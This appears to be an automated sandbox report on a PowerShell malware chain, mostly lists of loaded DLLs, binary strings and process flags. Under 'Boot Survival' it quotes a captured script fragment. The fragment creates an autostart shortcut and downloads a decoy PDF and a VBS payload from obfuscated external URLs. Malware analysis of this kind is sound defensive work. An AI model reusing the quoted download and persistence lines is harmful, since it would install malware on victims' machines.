      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1554956460.0000011073522000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1554760790.000001107350D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1781902419.000001CA73110000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ll\System.pdbdir=C: source: powershell.exe, 00000000.00000002.1786312887.000001CA733E2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb/ source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7333C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552154954.00000110733B2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdbW source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb56l source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?t.Automation.pdb& source: powershell.exe, 00000003.00000002.1554229305.00000110734B6000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4B0A0D6C push eax; ret 3_2_00007FFB4B0A0D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htnobwww.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.pdf';getit -fz $flol -oulv 'http://www.bluacmmaxxlasacmr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
